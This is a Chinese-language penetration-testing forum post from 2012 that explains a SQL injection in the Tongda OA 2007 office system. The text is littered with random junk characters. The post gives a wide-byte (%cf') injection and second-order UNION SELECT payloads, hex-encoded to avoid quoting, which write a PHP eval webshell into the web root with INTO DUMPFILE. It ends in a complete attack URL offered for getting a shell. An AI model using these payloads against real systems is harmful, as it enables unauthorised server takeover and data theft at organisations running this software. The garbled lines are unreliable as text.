中国网络渗透测试联盟

标题: 通达OA2007版本漏洞及getshell [打印本页]
作者: admin    时间: 2012-12-20 08:09
标题: 通达OA2007版本漏洞及getshell
目前测试通达OA2007版本3 n7 P5 E) Z0 e: M/ i* S) B! Q

' X9 u1 Z: Y: Y1 v/ F
' K: |. l0 @0 U; gOffice Anywhere 2007 网络智能办公系统
5 d9 [- o5 p7 ]) s3 d$ q7 B) p ' f5 D) B. e% U3 i
http://127.0.0.1/pda/news/read.php?P=%cf'    猪点。   暴web目录..! ^; k, V. t: n, X

" R9 l/ ]: }8 c0 _& p  ~. E6 N
7 I( W: f; D2 d) U  C; W这个时候看了下代码,存在注入的那个变量的语句中第3个字段,在该文件下面被另外个select语句调用了,灵光一闪,大概思路是这样的
. a+ c/ A$ o1 A6 `
0 b: S9 [# s0 N, v. z$ w例如:SELECT * from USER where USER_ID='{$USERNAME}'  
; g. u' ]+ ?  ~) _( |( i其中有这么段字段声明$PROVIDER = $ROW['PROVIDER'];被下面个语句$query1 = "SELECT * from USER where USER_ID='{$PROVIDER}'";带入查询了
% h# |" b) V& j
. o; u* [: u, y! j这个时候我们是不是可以组合起来使用哪?' d: Q3 c/ l" \
0 ^  n9 o; K. y/ r
第一条语句开始注入,union select 1,2,3,4,5,6,7,8,9,10...,比如第3个是PROVIDER字段,我们这样; d$ j! Y- N' m& X+ V
union select 1,2,'UNION SELECT 1,1,1,'<?php eval($v);?>',1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1 into dumpfile'B:/m.php'#,4,5,6,7,8,9,107 f4 ?: Z( c2 B7 m
8 Y  h% k! M7 E4 W; r# L5 r( f. j9 P
这样'UNION SELECT 1,1,1,'<?php eval($v);?>',1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1 into dumpfile'B:/m.php'#这个语句就带入第二条语句去写webshell了
' m+ g4 }5 ~$ Z: D9 e1 @ / W% U8 |/ N2 e- Z
那么问题来了,单引号可以吗?当然是不可以的,^_^。。。
1 b- X5 q2 ]; x
3 k9 T$ ]( E8 g9 h那么我们用字符串格式带入进行hex编码
/ w. g( M+ D. C0 t- C% [" B9 y * b% n( s! S7 R* \0 t2 `( d1 [
%cf'UNION SELECT 1,2,3,0x27554e494f4e2053454c45435420312c312c312c273c3f706870206576616c282476293b3f3e272c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c3120696e746f2064756d7066696c6527423a2f6d2e7068702723,5,6,7,8,9,10,11,12,13,14,15,16%23
( s5 l4 Y" F2 S" z& ?5 k9 p" ?5 G + U1 t# W0 \) z( ^. U. `
测试ok,获取oa的webshell
* a$ {1 A! @. L" y
' o0 X' T! B: e* U7 }  ^
# X* w7 l9 [5 |- ?1 E+ f, I4 {/ Spda/news/read.php?P=%cf'or%281=1%29%23&NEWS_ID=%cf'UNION SELECT 1,2,3,0x27554E494F4E2053454C45435420312C312C312C273C3F706870206576616C282476293B3F3E272C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C3120696E746F2064756D7066696C6527443A2F4D594F412F776562726F6F742F6D2E7068702723,5,6,7,8,9,10,11,12,13,14,15,16%23
+ V* W" s3 k5 X( W/ Z: M  r直接getwebshell



欢迎光临 中国网络渗透测试联盟 (https://cobjon.com/) Powered by Discuz! X3.2